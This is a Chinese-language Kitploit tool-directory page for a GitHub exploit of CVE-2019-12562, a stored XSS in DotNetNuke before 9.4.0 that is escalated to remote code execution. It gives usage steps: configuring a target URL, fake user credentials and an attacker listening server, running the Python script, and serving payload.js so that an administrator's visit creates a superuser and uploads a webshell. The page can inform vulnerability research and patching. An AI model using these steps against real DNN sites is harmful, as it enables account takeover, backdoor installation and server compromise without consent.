Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-12562 — 存储型跨站脚本攻击在 DotNetNuke (DNN) 9.4.0 之前的版本中 | XSS 到 RCE | Kitploit
工具/GitHubGitHub/mayaseven/cve-2019-12562
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubmayaseven/cve-2019-12562

CVE-2019-12562

存储型跨站脚本攻击在 DotNetNuke (DNN) 9.4.0 之前的版本中 | XSS 到 RCE

查看仓库
8416年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-12562

CVE-2019-12562 DotNetNuke (DNN) 9.4.0 之前版本中存在存储型跨站脚本漏洞,允许远程攻击者将恶意脚本存储并嵌入到管理员通知页面。该漏洞可用于执行任何管理员权限的操作,例如管理内容、添加用户、上传后门到服务器等。当管理员用户访问包含存储型跨站脚本的通知页面时,漏洞利用成功。

利用方法

  • 配置漏洞利用文件
root@kitploit:~
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN"   # 至少五个字符
PASSWORD = "P@ssw0rd" # 至少0个非字母数字字符,至少7个字符
EMAIL = "[email protected]" # 可修改为任意邮箱
# 用于监听事件的web服务器
LISTEN_URL = "http://yourdomain.com:1337"
  • 如果目标存在漏洞,运行该漏洞利用脚本将注册一个带有嵌入XSS的虚拟用户(字段为“显示名称”),并获取 payload.js。
root@kitploit:~
python3 CVE-2019-12562.py
  • 你需要搭建web服务器并在其上放置 payload.js,等待管理员连接。
root@kitploit:~
python -m SimpleHTTPServer 1337

该漏洞利用程序将在目标服务器上创建一个超级用户并上传webshell

利用条件:当管理员用户访问通知页面时,漏洞利用成功。

了解更多:https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ CVE参考:https://www.cvedetails.com/cve/CVE-2019-12562/

下载工具